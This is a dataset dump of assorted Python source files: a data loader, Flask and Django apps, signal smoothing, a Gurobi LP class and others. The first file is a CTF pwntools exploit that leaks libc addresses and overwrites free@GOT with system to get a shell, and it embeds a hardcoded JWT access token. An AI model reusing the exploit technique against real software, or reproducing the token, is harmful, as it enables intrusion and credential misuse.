id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
from pwn import *

# Pwn exploit for the "geelang-compiler" challenge: a DEL/BOX sequence creates
# a boxed/unboxed variable overlap that is used to leak heap, binary and libc
# addresses, then to overwrite the free@GOT entry with system("/bin/sh").
# BUG FIX: the original used the Python 2 `print GETSHELL` statement; the
# structure below also restores the indentation lost in the dataset dump.
PROGNAME = "./geelang-compiler"

if args.REMOTE:
    # The remote target is reached through a JWT-authenticated CLI relay.
    p = process(["./cli-relay", "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImNhZmZAZ2VlZ2xlLm9yZyIsInNlcnZpY2UiOiJ1YmVycHJveHlAc2VydmljZXMuZ2VlZ2xlLm9yZyIsImV4cCI6MTU3NTE0OTgwMn0.p-lpYOJ6RaImmd7HXm66pfZsUkk_Vbp206dDOqPSCzF0xuNEC6wDSeesh8ku_xMge_lbxEE9EzVzRBGpU92v5rVdiosjWT2oJP8ooSvatD3OcE8iZ3GFQpJZimUSMF6XigteUKxlAtKXjm8jg4NDQtVdXm5WQK3rSjvdOrzpoeU3kykIq6_Jmulv48a1bGLCaoetq55S-PL57rTrDwDsU6LqntJyQEDU15BO9ek9vZTDlDSs7TvyDp1UtAYZiWjx5qhgSOYqjmuMN9weTC8WAQJBdrMBzKWSfRD4CWozSfMvpazVMJcfqp-G9LKM64iW1m30Fnl_OYTM4NtHMrL4tRLGSfjPqptcd1GIYar3lxU5ka5161rSq-XSMLPVdbR7cRw1HVCz-Qbh2pxnp01DeA70Dm6rNvOhUglqHAnoNmajCUj7FxsGGHvnDOCwS7W8nAAVy1ctBfWf5fdR5a1VhTAoxLfYXXYNqi2uWPDQp5unraS1Ck35ZQKCbIo3gbT8IkbzSwO89ZTJwcs79nGRIlV9pQl1AWpKK-o8AeKBI-S65RZ-VcdcJX7MaCzun-7kZoD0ceF088Y9wSTUF7vpiTolop58qStey9ptdrz74RokJulS8u1n7WCnLL8kdairsyJkmsPA4O8q7bvtuANFMXQjO1bPxXjSbf7BOWUYyok", "geelang.corp.geegle.org"])
    elf = ELF(PROGNAME)
else:
    p = process(PROGNAME)
    elf = p.elf
libc = ELF("./libc.so.6")
pause()

# geelang program template; the {} slots are filled with symbol offsets below.
GETSHELL = '''
INT a 99
DEL a
BOX b 1 # Create boxed/unboxed overlap
PRINT a # Leak Heap chunk
INT z 24
SUB a z
PRINT b # Leak Binary (print_int) Address
SET z {}
MOV a b
SUB a z # Offset to binary base
PRINT a
SET z {}
ADD a z # Offset to free GOT entry
PRINT a
PRINT b # Leak free@GOT
INT SYSTEM 0
SET z {}
MOV SYSTEM b
SUB SYSTEM z # Offset to libc base
SET z {}
ADD SYSTEM z # Offset to system
PRINT SYSTEM
MOV b SYSTEM
SET a {} # /bin/sh
DEL a
END
'''.format(elf.symbols["print_int"],
           elf.got["free"],
           libc.symbols["free"],
           libc.symbols["system"],
           u64("/bin/sh\x00"))

print(GETSHELL)
pause()
p.sendline(GETSHELL)
p.interactive()
| StarcoderdataPython |
3598328 | from msdi_io import *
class batchLoader():
    """Loads (features, labels) batches from the MSDI dataset.

    A feature vector concatenates, per entry: the first 200 MFCC frames,
    the album image and the deep audio features, all flattened.
    """

    def __init__(self, batch_size, path_msdi, max_size=30712):
        self.i = 0                      # read cursor used by loadBatch()
        self.batch_size = batch_size
        self.path_msdi = path_msdi
        self.max_size = max_size        # cap on the number of entries read
        # BUG FIX: the original called get_msdi_dataframe(msdi_path), i.e. it
        # used the star-imported global and silently ignored `path_msdi`.
        self.msdi = get_msdi_dataframe(self.path_msdi)

    def load(self, batch_nb, img_size=None):
        """Return batch number `batch_nb` as (X, y).

        `img_size` was never used by the original implementation; it is now
        optional so callers may omit it (backward compatible).
        """
        # NOTE(review): despite its name this value is an index bound, not a
        # size, and self.i is never advanced by load() — confirm semantics.
        batch_size = min(self.i + self.batch_size, self.max_size)
        X = []
        y = []
        # Load the whole batch slice in one dataframe lookup.
        entry_idx = np.arange(batch_nb * batch_size, batch_size * (1 + batch_nb))
        one_entry = self.msdi.loc[entry_idx]
        for index, row in one_entry.iterrows():
            mfcc = load_mfcc(row, self.path_msdi)[:200]
            genre = get_label(row)
            if len(mfcc) < 200:
                # Entry too short: reject it (message kept verbatim).
                print("donnee trop courte (refusee) de type :", genre)
                continue
            img = load_img(row, self.path_msdi)
            deep_features = load_deep_audio_features(row, self.path_msdi)
            y.append(genre)
            data = np.hstack([mfcc.reshape(-1), img.reshape(-1), deep_features.reshape(-1)])
            X.append(data)
        return np.array(X), y

    def loadBatch(self):
        """Return the next sequential batch, advancing the internal cursor."""
        batch_size = min(self.i + self.batch_size, self.max_size)
        X = []
        y = []
        for i_batch in range(batch_size):
            entry_idx = self.i + i_batch
            one_entry = self.msdi.loc[entry_idx]
            mfcc = load_mfcc(one_entry, self.path_msdi)[:200]
            genre = get_label(one_entry)
            if len(mfcc) < 200:
                print("donnee trop courte (refusee) de type :", genre)
                continue
            img = load_img(one_entry, self.path_msdi)
            deep_features = load_deep_audio_features(one_entry, self.path_msdi)
            y.append(genre)
            data = np.hstack([mfcc.reshape(-1), img.reshape(-1), deep_features.reshape(-1)])
            X.append(data)
        # NOTE(review): advancing by the last loop index looks off by one —
        # confirm before relying on consecutive, non-overlapping batches.
        self.i += i_batch
        return np.array(X), y
if __name__ == '__main__':
    # Smoke test: iterate the first ten batches and report shapes.
    print('Labels:', get_label_list())
    bl = batchLoader(100, path_msdi=msdi_path)
    for i in range(10):
        # BUG FIX: load() requires a second argument (img_size, unused by the
        # implementation); the original call `bl.load(i)` raised a TypeError.
        X, y = bl.load(i, None)
        print(X.shape, len(y))
        # print(X[1])
    """ print('Labels:', get_label_list())
bl = batchLoader(100,path_msdi=msdi_path)
for i in range(10):
for batch in bl.loadBatch():
X,y = batch[0],batch[1]
print()
print(X[1])
"""
| StarcoderdataPython |
3339970 | """
-- UnmaintableCode: C Module --
Author: @CosasDePuma <<EMAIL>>(https://github.com/cosasdepuma)
"""
# pylint: disable=too-few-public-methods, no-self-use, unused-argument, dangerous-default-value
import re
from random import randint
class Module:
    """Obfuscation module: renames source variables to runs of underscores."""

    def __init__(self, variables):
        self.head = ''              # no header code is ever emitted
        self.variables = variables  # candidate identifiers to rename

    def run_(self, code, args=None):
        """Rename args['n'] randomly chosen variables to _, __, ___, ...

        BUG FIX: the original used a mutable dict ({'n': 3}) as the default
        for `args`; the default is now created fresh on every call.
        """
        if args is None:
            args = {'n': 3}
        for i in range(args['n']):
            # Pick a random candidate and replace whole-word occurrences.
            changed = self.variables[randint(0, len(self.variables) - 1)]
            code = re.sub('\\b{}\\b'.format(changed), '_' * (i + 1), code)
        return self.head, code
| StarcoderdataPython |
1842945 | from sqlalchemy.orm import relationship
from db import db
import datetime
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class Comments(db.Model, Base):
    """A user comment attached to a blog post."""

    id = db.Column(db.Integer, primary_key=True)
    # Defaults to the creation instant when the caller does not supply one.
    publishedOn = db.Column(db.DateTime(), nullable=False, default=datetime.datetime.utcnow)
    content = db.Column(db.Text(), nullable=False)
    post_id = db.Column(db.Integer, db.ForeignKey('posts.id'), nullable=False)
    post = relationship("Posts", viewonly=True)
    user_id = db.Column(db.Integer, db.ForeignKey('users.id'), nullable=False)
    user = relationship("UserModel", viewonly=True)

    def __init__(self, content, publishedOn, post_id, user_id) -> None:
        self.content = content
        self.publishedOn = publishedOn
        self.post_id = post_id
        self.user_id = user_id
        super().__init__()

    def save_to_db(self):
        """Persist this comment in the current database session."""
        db.session.add(self)
        db.session.commit()
4881203 | <reponame>leighmforrest/frankenblog
from django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView
from django.core.exceptions import PermissionDenied
from django.contrib.auth.mixins import LoginRequiredMixin, PermissionRequiredMixin
from django.contrib import messages
from django.shortcuts import redirect
from blog.models import Post
from blog.forms import CommentForm, PostForm
class PostListView(ListView):
    """Home page listing of all posts."""
    model = Post
    context_object_name = 'posts'
    template_name = 'pages/home.html'
class PostDetailView(DetailView):
    """Single-post page; authenticated visitors also get a comment form."""
    model = Post
    context_object_name = 'post'
    template_name = 'blog/detail.html'

    def get_context_data(self, **kwargs):
        ctx = super().get_context_data(**kwargs)
        user = self.request.user
        if user and user.is_authenticated:
            ctx['form'] = CommentForm()
        return ctx
class PostCreateView(PermissionRequiredMixin, CreateView):
    """Create a post; requires the 'blog.can_create_post' permission."""
    model = Post
    form_class = PostForm
    template_name = 'blog/create.html'
    permission_required = 'blog.can_create_post'

    def form_valid(self, form):
        # Attach the submitting user's author profile before saving.
        # (assumes request.user.author is queryset-like — confirm upstream)
        form.instance.author = self.request.user.author.first()
        return super().form_valid(form)
class PostUpdateView(LoginRequiredMixin, UpdateView):
    """Edit a post; only the post's own author may proceed."""
    model = Post
    form_class = PostForm
    context_object_name = 'post'
    template_name = 'blog/update.html'

    def dispatch(self, request, *args, **kwargs):
        post = self.get_object()
        # NOTE(review): the double `.author.author` traversal mirrors the
        # original code exactly — verify it is intended and not a typo.
        if post.author.author != self.request.user:
            raise PermissionDenied
        return super().dispatch(request, *args, **kwargs)
class CommentCreateView(LoginRequiredMixin, CreateView):
    """POST-only endpoint creating a comment on a given post."""
    form_class = CommentForm
    http_method_names = ['post']

    def form_invalid(self, form):
        # On validation failure, flash an error and bounce back to the post.
        target = Post.objects.get(pk=self.kwargs['pk'])
        messages.error(self.request, 'Comment not created.')
        return redirect(target.get_absolute_url())

    def form_valid(self, form):
        target = Post.objects.get(pk=self.kwargs['pk'])
        comment = form.save(commit=False)
        comment.user = self.request.user
        comment.post = target
        comment.save()
        return super().form_valid(form)
| StarcoderdataPython |
3599230 | from flask import Flask, render_template, redirect, jsonify
from flask_pymongo import PyMongo
import scrape_mars
# Create the Flask application instance.
app = Flask(__name__)
# Use PyMongo to establish the mongo connection (database mars_app, localhost).
mongo = PyMongo(app, uri="mongodb://localhost:27017/mars_app")
@app.route("/")
def home():
    """Render the home page with the latest scraped Mars document (if any)."""
    document = mongo.db.mars_collection.find_one()
    return render_template("index.html", mars_collection=document)
@app.route("/scrape")
def scraper():
    """Re-scrape Mars data, upsert the single document, then go home."""
    mars_collection = mongo.db.mars_collection
    mars_data = scrape_mars.scrape_info()
    # BUG FIX: Collection.update() is deprecated and removed in modern
    # PyMongo; the original call replaced the whole (single) document,
    # which is exactly what replace_one() does.
    mars_collection.replace_one({}, mars_data, upsert=True)
    return redirect("/", code=302)
if __name__ == "__main__":
app.run(debug=True)  # Flask development server with auto-reload
| StarcoderdataPython |
253918 | from __future__ import absolute_import, division, print_function
import os
import sys
sys.path.append('/'.join([os.environ['_CIOP_APPLICATION_PATH'], 'util']))
sys.path.append('../util')
import numpy as np
import gdal
import osr
import urllib.parse as urlparse
import pandas as pd
import datetime
from vam.whittaker import ws2d, ws2doptv, ws2doptvp, lag1corr
from itertools import chain
import cioppy
import array
import geopandas as gpd
def get_vsi_url(enclosure, user, api_key):
    """Build a GDAL /vsicurl/ URL for `enclosure`, injecting basic-auth
    credentials into the netloc and routing the path through /api."""
    parts = urlparse.urlparse(enclosure)
    scheme, netloc, path = parts[0], parts[1], parts[2]
    return '/vsicurl/%s://%s:%s@%s/api%s' % (scheme, user, api_key, netloc, path)
def analyse_row(row):
    """Derive day (YYYYMMDD), julian day (YYYYDDD) and tile col-row from a
    catalogue row holding 'startdate' (ISO 8601) and 'title' (…C:xx…R:yy…)."""
    day = row['startdate'].split('T')[0].replace('-', '')
    stamp = datetime.datetime.strptime(day, '%Y%m%d').timetuple()
    jday = '{}{:03d}'.format(stamp.tm_year, stamp.tm_yday)
    col = row['title'].split('C:')[1][:2]
    line = row['title'].split('R:')[1][:2]
    return pd.Series({'day': day, 'jday': jday, 'col-row': '{}-{}'.format(col, line)})
def analyse_gps(row, user, api_key, land_mask_band):
    """Open the product referenced by `row` over /vsicurl and report its
    bounding box plus the fraction of pixels whose land-mask value is 1."""
    url = get_vsi_url(row.enclosure, user, api_key)
    dataset = gdal.Open(url)
    # Geotransform: upper-left origin, pixel sizes and rotation terms.
    ulx, xres, xskew, uly, yskew, yres = dataset.GetGeoTransform()
    lrx = ulx + (dataset.RasterXSize * xres)
    lry = uly + (dataset.RasterYSize * yres)
    land_mask = np.array(dataset.GetRasterBand(land_mask_band).ReadAsArray(), dtype=np.uint8)
    land_covered = (land_mask == 1).sum() / land_mask.size
    return pd.Series({
        'ul_x': ulx,
        'ul_y': uly,
        'lr_x': lrx,
        'lr_y': lry,
        'data_content': land_covered,
    })
def fromjulian(x):
    """Parse a julian date string 'YYYYJJJ' into a datetime.date."""
    return datetime.datetime.strptime(x, '%Y%j').date()
def generate_dates(startdate_string=None, enddate_string=None, delta=5):
    """Return julian-date strings 'YYYYJJJ' stepping `delta` days from
    `startdate_string` through (at least) `enddate_string`."""
    start = datetime.datetime.strptime(startdate_string, '%Y%j').date()
    end = datetime.datetime.strptime(enddate_string, '%Y%j').date()
    span = (end - start).days + delta
    steps = [start + datetime.timedelta(days=offset) for offset in range(0, span, delta)]
    return ['{}{:03d}'.format(d.year, d.timetuple().tm_yday) for d in steps]
def whittaker(ts, date_mask):
"""
Apply the whittaker smoothing to a 1d array of floating values.
Args:
ts: array of floating values; the value 255 marks missing samples
date_mask: full list of julian dates as string YYYYJJJ; falsy entries
mark dates with no associated product
Returns:
tuple of floats: (s smoothing parameter, lag-1 correlation, smoothed
series interpolated over the full date_mask grid)
"""
nan_value = 255
ts_double=np.array(ts,dtype='double')
# Weight mask: 0 where the sample equals the nan sentinel, 1 elsewhere.
mask = np.ones(len(ts))
mask[ts==nan_value]=0
# the output defaults to the nan sentinel for every date
data_smooth = np.array([nan_value]*len(date_mask))
# proceed only if at least one valid sample exists
if np.sum(mask)>0:
w=np.array((ts!=nan_value)*1,dtype='double')
# candidate log10(s) values scanned by the V-curve optimisation
lrange = array.array('d', np.linspace(-2, 4, 61))
try:
# apply whittaker filter with V-curve
zv, loptv = ws2doptvp(ts_double, w, lrange, p=0.90)
#parameters needed for the interpolation step
dvec = np.zeros(len(date_mask))
w_d=np.ones(len(date_mask), dtype='double')
# adding new dates with no associated product to the weights
for idx, el in enumerate(date_mask):
if not el:
w_d[idx]= 0
# scatter the smoothed values onto the dates that had products
dvec[w_d==1]= zv
# apply whittaker filter with very low smoothing to interpolate
data_smooth = ws2d(dvec, 0.0001, w_d)
# Calculates Lag-1 correlation
lag1 = lag1corr(ts_double[:-1], ts_double[1:], nan_value)
except Exception as e:
# on any failure fall back to sentinel outputs and log the error
loptv = 0
lag1 = nan_value
print(e)
print(mask)
else:
# every sample missing: nothing to smooth
loptv = 0
lag1 = nan_value
return tuple(np.append(np.append(loptv,lag1), data_smooth))
| StarcoderdataPython |
4886570 | <filename>api/services/vote_service.py
from django.http import HttpResponse, JsonResponse
from rest_framework import serializers
from api.services.home_service import error
from repository.repos import Vote
from api.dto.vote_dto import VoteSerializer
def votes(request):
    """Return every vote, serialized, as a JSON array response."""
    records = Vote.get_all()
    payload = VoteSerializer(records, many=True).data
    return JsonResponse(payload, safe=False)
| StarcoderdataPython |
11356879 | <gh_stars>1-10
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
import io
from setuptools import setup, find_packages
# Package metadata for django-expenses.
# BUG FIX: the original passed io.open(...).read() inline, leaking the
# README file handle; the file is now read inside a context manager.
with io.open("./README.rst", "r", encoding="utf-8") as readme_file:
    long_description_text = readme_file.read()

setup(
    name="django-expenses",
    version="0.5.0",
    description="A comprehensive system for managing expenses",
    keywords="django,expenses",
    author="<NAME>",
    author_email="<EMAIL>",
    url="https://github.com/Kwpolska/django-expenses",
    license="3-clause BSD",
    long_description=long_description_text,
    platforms="any",
    zip_safe=False,
    # http://pypi.python.org/pypi?%3Aaction=list_classifiers
    classifiers=[
        "Development Status :: 5 - Production/Stable",
        "Programming Language :: Python",
        "Programming Language :: Python :: 3",
        "Framework :: Django",
        "License :: OSI Approved :: BSD License",
        "Topic :: Office/Business :: Financial",
    ],
    packages=find_packages(),
    install_requires=["Django>=2.1", "Babel", "pygal", "django-oauth-toolkit", "iso8601", "attrs"],
)
| StarcoderdataPython |
310250 | from kratos import Interface
class GlbConfigInterface(Interface):
    """Configuration read/write interface: the master drives write/read
    commands, the slave returns read data plus a valid strobe."""

    def __init__(self, addr_width: int, data_width: int):
        Interface.__init__(self, f"glb_cfg_ifc_A_{addr_width}_D_{data_width}")

        # Interface signals.
        self.wr_en = self.var("wr_en", 1)
        self.wr_addr = self.var("wr_addr", addr_width)
        self.wr_data = self.var("wr_data", data_width)
        self.rd_en = self.var("rd_en", 1)
        self.rd_addr = self.var("rd_addr", addr_width)
        self.rd_data = self.var("rd_data", data_width)
        self.rd_data_valid = self.var("rd_data_valid", 1)

        master_driven = [self.wr_en, self.wr_addr, self.wr_data,
                         self.rd_en, self.rd_addr]
        slave_driven = [self.rd_data, self.rd_data_valid]

        self.master = self.modport("master")
        self.slave = self.modport("slave")
        for signal in master_driven:
            self.master.set_output(signal)
            self.slave.set_input(signal)
        for signal in slave_driven:
            self.master.set_input(signal)
            self.slave.set_output(signal)
| StarcoderdataPython |
4985008 | # -*- coding: utf-8 -*-
"""Helper utilities and decorators."""
import importlib
import uuid
from flask import flash, jsonify
from cartunningservice.constants.http_status_codes import STATUS_CODES
def flash_errors(form, category='warning'):
    """Flash every validation error attached to `form`."""
    for field_name, field_errors in form.errors.items():
        label = getattr(form, field_name).label.text
        for message in field_errors:
            flash('{0} - {1}'.format(label, message), category)
def response(payload, meta=None, status_code=200, message=None):
    """Wrap `payload` in the API envelope {'meta': ..., 'data': ...}.

    :param payload: {list|dict|str} response payload
    :param meta: optional extra keys merged into the meta section
    :param status_code: {int} http response status code
    :param message: {str} overrides the default status-code message
    """
    # Reject status codes the API does not know about.
    if status_code not in STATUS_CODES:
        raise Exception('Status code does not exist.')
    envelope = {
        'meta': {
            'code': status_code,
            'message': message if message else STATUS_CODES[status_code],
        },
        'data': payload,
    }
    if meta is not None:
        envelope['meta'].update(meta)
    return jsonify(envelope), status_code
def underscore_to_camelcase(value):
    """
    Transformation string from underscore to camelcase
    :param value: {str} underscored string
    :return: {str} camelcased string
    """
    pieces = []
    first_word_seen = False
    for segment in value.split("_"):
        if not segment:
            # Empty segment (double/leading underscore): keep a literal '_'.
            pieces.append('_')
        elif not first_word_seen:
            # The very first real word stays lowercase here...
            pieces.append(segment.lower())
            first_word_seen = True
        else:
            pieces.append(segment.capitalize())
    joined = "".join(pieces)
    # ...and the overall result gets its first character uppercased.
    return joined[0].upper() + joined[1:]
def generate_uuid():
    """
    Generate new uuid
    :return: {string} uuid4 in its canonical 36-character form
    """
    return str(uuid.uuid4())
| StarcoderdataPython |
4911678 | <gh_stars>0
# Script that concatenates the AOJ_row .py files into a single text file
#python3 yomikaki.py >> aoj_row.txt
import glob
from tqdm import tqdm
import csv
# input_files = glob.glob("/Users/t_kajiura/AOJ_raw/*.py")
#AOJ_rowの.pyファイル達を一つのテキストファイルにするコード
def pytotxt(input_files):
    """Copy each file in `input_files` into '<name>_pytorch_tutorial.txt'.

    Lines are rewritten without their trailing newline character and
    re-joined with '\\n' (so the output has no final newline).
    NOTE(review): the original called rstrip/lstrip without using their
    return values, so no stripping ever happened; that dead code is removed
    here and the observable output is unchanged.
    """
    for input_file in input_files:
        with open(f'{input_file}_pytorch_tutorial.txt', "w") as my_output_file:
            print(input_file)
            with open(input_file) as my_input_file:
                kept_lines = []
                for line in my_input_file:
                    # Drop the trailing character; join() restores newlines.
                    kept_lines.append(line[:-1])
                my_output_file.write('\n'.join(kept_lines))
def commentout(input_files):
    """Copy each file to '<name>_mae.txt', dropping full-line '#' comments
    and blank lines; remaining lines are joined with '\\n'.

    Cleanups vs. the original: `startswith(...) == True` comparison,
    nested if/pass branches and the redundant explicit close are removed;
    behaviour is unchanged.
    """
    for input_file in input_files:
        with open(f"{input_file}_mae.txt", "w") as my_output_file:
            print(input_file)
            with open(input_file) as my_input_file:
                kept = []
                for line in my_input_file:
                    # Skip full-line comments and empty lines.
                    if line.startswith("#") or line == "\n":
                        continue
                    kept.append(line[:-1])
                my_output_file.write('\n'.join(kept))
def sakujyo(input_files):
    """Strip leading/trailing double quotes from every TSV field and write
    the bare fields to '<name>_out.tsv' (Codex output post-processing).

    NOTE(review): fields are written back with no tab or newline separators,
    mirroring the original behaviour — confirm that is really intended.
    Large blocks of commented-out experimental code were removed.
    """
    for input_file in input_files:
        with open(f'{input_file}_out.tsv', mode='w') as my_output_file:
            with open(input_file) as my_input_file:
                reader = csv.reader(my_input_file, delimiter='\t')
                for row in reader:
                    for field in row:
                        # lstrip/rstrip remove *all* leading/trailing quotes,
                        # exactly as the original did.
                        my_output_file.write(field.lstrip('"').rstrip('"'))
input_files_tsv = glob.glob("")
def tsvtotxt(csv_file):
    """Rewrite a delimited file as '<name>.txt' with fields joined by spaces.

    NOTE(review): csv.reader is used with the default comma delimiter even
    though callers pass .tsv paths — confirm the files are comma separated.
    Cleanup: the side-effect list comprehension and redundant close were
    replaced with a plain loop; output is unchanged.
    """
    with open(csv_file, "r") as my_input_file, open(f'{csv_file}.txt', "w") as my_output_file:
        for row in csv.reader(my_input_file):
            my_output_file.write(" ".join(row) + '\n')
input_files_tsv = glob.glob("/Users/t_kajiura/Git/add_training/input_file/codex_out/*.tsv")
# Convert every Codex-output TSV; tqdm shows progress.
for csv_file in tqdm(input_files_tsv):  # change the glob path on each run
print(csv_file)
tsvtotxt(csv_file)
## ここ実行部分だよ---------------------------
# input_files_py = glob.glob("/Users/t_kajiura/Git/add_training/tutorials/*.py")#毎回変更
# input_files_txt = glob.glob("/Users/t_kajiura/Git/add_training/torchdata.txt")#毎回変更
# input_codes_txt = glob.glob("/Users/t_kajiura/Git/add_training/codexdata/python_train_*_out.tsv")#毎回変更
# # for input_file in tqdm(input_files_py):#毎回変更
# # # i = i+2
# # print(input_file)
# # pytotxt(input_files_py)
# commentout(input_files_txt)
# # sakujyo(input_codes_txt)
# Procedure memo (self-reference, 12/24) ---------------------------
# 1. Convert the tutorial-downloaded .ipynb files to .py with
#    [jupyter nbconvert --to python XXX.ipynb]
# 2. Convert the .py files to .txt with pytotxt(input_files)
# 3. The .txt marks Japanese comment lines with '#', so strip everything to
#    the right of the '#' with a regular expression
#------------------------------------------- | StarcoderdataPython |
9727717 | # -*- coding: utf-8 -*-
"""
NotiHub
Copyright 2017 <NAME> <<EMAIL>>
Unofficial Facebook Chat API for Python [https://github.com/carpedm20/fbchat]
Unofficial Facebook Chat API [https://github.com/Schmavery/facebook-chat-api]
The following code is licensed under the MIT License
"""
import fbchat
from .__stub__ import Service
fbchat.log.disabled = True
class service(Service):
    """Facebook Messenger transport built on the unofficial fbchat client."""

    __VERSION__ = "0.0.1"
    __NAME__ = "MESSENGER"

    class Messenger(fbchat.Client):
        """fbchat.Client subclass forwarding inbound messages to the hub."""

        def __init__(self, parent, *args):
            super().__init__(*args)
            # Expose (service name, account uid) back to the parent service.
            parent.id = (parent.__NAME__, self.uid)
            self.dbWriter = parent.dbWriter

        def registerOnMessage(self, function):
            self.handler = function

        def onMessage(self, ts, thread_id, author_id, message, thread_type, **kwargs):
            # NOTE(review): nesting reconstructed from a flat dump — the
            # handler dispatch is assumed to be gated on a non-empty message.
            if message:
                self.dbWriter(ts, thread_id, author_id, message)
                # Do not feed our own outbound messages back into the handler.
                if self.uid != author_id:
                    self.handler(
                        lambda thread_id, message: self.sendMessage(message, thread_id=thread_id, thread_type=thread_type),
                        ts, thread_id, author_id, message)

    def connect(self):
        self.messenger = self.Messenger(self, *self.config.getAuth())
        self.messenger.registerOnMessage(self.config.handler)
        self.listen()

    def send(self, thread, data):
        if self.config.send:
            # Query the thread to decide between GROUP and USER delivery.
            thread_type = fbchat.ThreadType.GROUP if self.messenger.graphql_request(
                fbchat.GraphQL(doc_id='1386147188135407', params={
                    'id': thread,
                    'message_limit': 0,
                    'load_messages': False,
                    'load_read_receipts': False,
                    'before': None
                })).get("thread_type") == "GROUP" else fbchat.ThreadType.USER
            return self.messenger.sendMessage(data, thread_id=thread, thread_type=thread_type)

    def listen(self):
        if self.config.receive:
            self.messenger.listen()

    def stopListen(self):
        self.messenger.stopListening()
| StarcoderdataPython |
1891137 | from __future__ import annotations
from typing import cast
from coredis._utils import EncodingInsensitiveDict
from coredis.response._callbacks import ResponseCallback
from coredis.response._utils import flat_pairs_to_dict
from coredis.response.types import LibraryDefinition
from coredis.typing import (
AnyStr,
Dict,
List,
Mapping,
Optional,
ResponsePrimitive,
ResponseType,
Union,
ValueT,
)
class FunctionListCallback(
ResponseCallback[
List[ResponseType], List[ResponseType], Mapping[str, LibraryDefinition]
]
):
# Shapes the raw FUNCTION LIST reply (flat key/value pairs per library)
# into a mapping of library name -> LibraryDefinition.
def transform(
self, response: List[ResponseType], **options: Optional[ValueT]
) -> Mapping[str, LibraryDefinition]:
# Each library arrives as a flat [key, value, ...] list.
libraries = [
EncodingInsensitiveDict(flat_pairs_to_dict(cast(List[ValueT], library)))
for library in response
]
transformed = EncodingInsensitiveDict()
for library in libraries:
lib_name = library["library_name"]
functions = EncodingInsensitiveDict({})
for function in library.get("functions", []):
function_definition = EncodingInsensitiveDict(
flat_pairs_to_dict(function)
)
functions[function_definition["name"]] = function_definition
# Flags are reported as a sequence; expose them as a set.
functions[function_definition["name"]]["flags"] = set(
function_definition["flags"]
)
library["functions"] = functions
transformed[lib_name] = EncodingInsensitiveDict(
LibraryDefinition(
name=library["name"],
engine=library["engine"],
description=library["description"],
functions=library["functions"],
library_code=library["library_code"],
)
)
return transformed
class FunctionStatsCallback(
ResponseCallback[
List[ResponseType],
Dict[AnyStr, Union[AnyStr, Dict[AnyStr, Dict[AnyStr, ResponsePrimitive]]]],
Dict[AnyStr, Union[AnyStr, Dict[AnyStr, Dict[AnyStr, ResponsePrimitive]]]],
]
):
# Shapes the flat FUNCTION STATS reply into nested dicts, expanding the
# per-engine statistics.
def transform(
self,
response: List[ResponseType],
**options: Optional[ValueT],
) -> Dict[AnyStr, Union[AnyStr, Dict[AnyStr, Dict[AnyStr, ResponsePrimitive]]]]:
transformed = flat_pairs_to_dict(response)
# The "engines" key may arrive as bytes or str depending on decoding.
key = cast(AnyStr, b"engines" if b"engines" in transformed else "engines")
engines = flat_pairs_to_dict(cast(List[AnyStr], transformed.pop(key)))
engines_transformed = {}
for engine, stats in engines.items():
# Per-engine stats are themselves flat [key, value, ...] lists.
engines_transformed[engine] = flat_pairs_to_dict(cast(List[AnyStr], stats))
transformed[key] = engines_transformed # type: ignore
return cast(
Dict[AnyStr, Union[AnyStr, Dict[AnyStr, Dict[AnyStr, ResponsePrimitive]]]],
transformed,
)
# Replies from this protocol variant arrive already structured; passthrough.
def transform_3(
self,
response: Dict[
AnyStr, Union[AnyStr, Dict[AnyStr, Dict[AnyStr, ResponsePrimitive]]]
],
**options: Optional[ValueT],
) -> Dict[AnyStr, Union[AnyStr, Dict[AnyStr, Dict[AnyStr, ResponsePrimitive]]]]:
return response
| StarcoderdataPython |
128420 | <filename>utils/__init__.py
import utils.tokenizer
import utils.colouring | StarcoderdataPython |
229186 | # -*- coding: utf-8 -*-
"""
Class: LinearProgramming
"""
import numpy as np
import gurobipy as gp
class LinearProgramming():
    """
    LinearProgramming defines and solves a LP problem with Gurobi.

    The problem is configured through alternating key/value arguments:
    "cmax" or "cmin" (cost vector), "ineq_a"/"ineq_b" (A x <= b),
    "lb"/"ub" (variable bounds).
    """

    def __init__(self, *args):
        """
        __init__ creates a LP problem from alternating key/value arguments.
        """
        try:
            problem_configuration = self._listtodict(list(args))
        except SyntaxError:
            print("Syntax error in the configuration of the LP problem.\n")
        self._set_costfunction(problem_configuration)
        # dict.get returns None for missing keys, matching the original
        # per-key if/else blocks.
        self.inequality_constraint_a = problem_configuration.get("ineq_a")
        self.inequality_constraint_b = problem_configuration.get("ineq_b")
        self.lower_bound = problem_configuration.get("lb")
        self.upper_bound = problem_configuration.get("ub")
        self.consistency_flag = False
        self.canonical_flag = False
        # Variables used in the class (filled by later processing steps).
        self.canonical_max_kpi = None
        self.canonical_inequality_constraint_a = None
        self.canonical_inequality_constraint_b = None
        self.gurobi_lp_model = None
        self.gurobi_lp_variable = None
        self.optimum_x = None
        self.optimum_y = None

    def _set_costfunction(self, problem_configuration):
        """Set minimize_problem / costfunction_matrix from the config dict.

        BUG FIX: when neither (or both) of "cmax"/"cmin" was given, the
        original __init__ left `minimize_problem` undefined; it is now
        consistently set to None (as reset_costfunction_matrix already did).
        """
        has_max = "cmax" in problem_configuration
        has_min = "cmin" in problem_configuration
        if has_max and not has_min:
            self.minimize_problem = False
            # Stored negated so the internal convention is "minimize".
            self.costfunction_matrix = -problem_configuration["cmax"]
        elif has_min and not has_max:
            self.minimize_problem = True
            self.costfunction_matrix = problem_configuration["cmin"]
        else:
            self.minimize_problem = None
            self.costfunction_matrix = None

    def _invalidate(self):
        """Mark cached consistency/canonical state stale after any edit."""
        self.consistency_flag = False
        self.canonical_flag = False

    def reset_costfunction_matrix(self, *args):
        """
        reset_costfunction_matrix resets the cost function matrix of the LP problem.
        """
        try:
            problem_configuration = self._listtodict(list(args))
        except SyntaxError:
            print("Syntax error in the configuration of the LP problem.\n")
        self._set_costfunction(problem_configuration)
        self._invalidate()

    def reset_inequality_constraint_a(self, inequality_constraint_a):
        """
        reset_inequality_constraint_a resets the inequality constraint a
        """
        self.inequality_constraint_a = inequality_constraint_a
        self._invalidate()

    def reset_inequality_constraint_b(self, inequality_constraint_b):
        """
        reset_inequality_constraint_b resets the inequality constraint b
        """
        self.inequality_constraint_b = inequality_constraint_b
        self._invalidate()

